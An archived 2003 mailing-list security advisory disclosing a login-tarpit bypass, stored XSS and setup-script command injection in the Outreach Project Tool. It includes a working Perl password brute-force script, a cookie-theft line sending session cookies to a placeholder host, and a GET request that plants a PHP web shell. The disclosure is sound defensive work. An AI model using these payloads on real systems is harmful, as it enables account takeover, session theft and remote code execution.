Outreach Project Tool

From: Martin Eiszner (martinat_private)
Date: Thu Jan 16 2003 - 07:52:15 PST

Next message: securityat_private: "Security Update: [CSSA-2003.003.0] Linux: wget directory traversal and buffer overrun vulnerabilities"

Previous message: Nicob: "Re: Bug in w-agora"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

to the list,


2003/01/16 @meiat_private

=====================================
Outreach Project Tool
=====================================

Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)

Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
Licensse: GPL
VendorStatus: Informed on Oct 2002
VendorStatus: ---
VendorPatch: ---

Local: NO
Remote: YES

Vulnerabilities:
1) Tarpit out-cheat (brute-force attack)
2) Cross-Site-Scripting
3) Setup

Tested Plattforms: Linux / Slackware 8.0 i686 / Apache 1.3.*

Severety: MEDIUM


============
Introduction
============

The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat
ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult
ants and their clients, as well as a wide range of other applications.

=====================
Vulnerability Details
=====================

SUMMARY

1) Request Header allows Tarpit - out-cheat
2) Multiple XSS-problems in community/forums
3) Setup (/opt/setup) permission issues

B) Description of Vulnerabilities

1) REQUEST-HEADER TARPIT - OUT-CHEAT

The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"-
environment variables.

This is done to identify possible proxy-servers.
Unfortunately these variables are part of the HTTP-request headers.

the follwoing http-request:
---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---

"$HTTP_VIA" will be used as the users IP.

Thus leading to:

-Anonymous use of the application
-Possibility of a brute-force attack against accounts

Simple example for a brute-force attack against OPT:

---cut here---

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);

---cut here---

2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others

Typical XSS vulnerabilities exist in manny/most of the community-functions.

Example:

Once logged in ... goto "Notes -> News -> Ad News"
Then create a News with scripting tags included:

---cut here---
hello i am a news thing .. bla bla ...
<script> alert(document.cookie); </script>
---cut here---

Now every user gets now an alert window with his own session-id.(only as example!!)

Of course it is possible to steal the OPT_Session by requesting
another url where a so called cookie-theft is installed !!

(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)

This vulnerability makes it possible once logged in to steal "any" other users
accounts (administrator included !).


3) SETUP-ISSUES (/opt/setup)

If the lockfile "lock01" in the setup_lock-directory is not removed due to
wrong permission settings or someone is able/allowed to create a file "lock01"
it is possible to:

a) Create a new Setup
b) Execute system-commands thru the setup.php - script.

This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function.

Example GET-Request:
---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---

Above will create a script called "bad.php" with content(<?passthru($c)?>)in the
OPT-setup directory !


=======
Remarks
=======

---

====================
Recommended Hotfixes
====================

After installation check if file "lock01" exists in setup_lock-directory.
if yes, remove it.

The other vulnerabilities can only be fixed by sw-patches.


EOF Martin Eiszner / @2002WebSec.org


=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna

Austria / EUROPE
meiat_private
http://www.websec.org

Next message: securityat_private: "Security Update: [CSSA-2003.003.0] Linux: wget directory traversal and buffer overrun vulnerabilities"
Previous message: Nicob: "Re: Bug in w-agora"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jan 17 2003 - 11:58:40 PST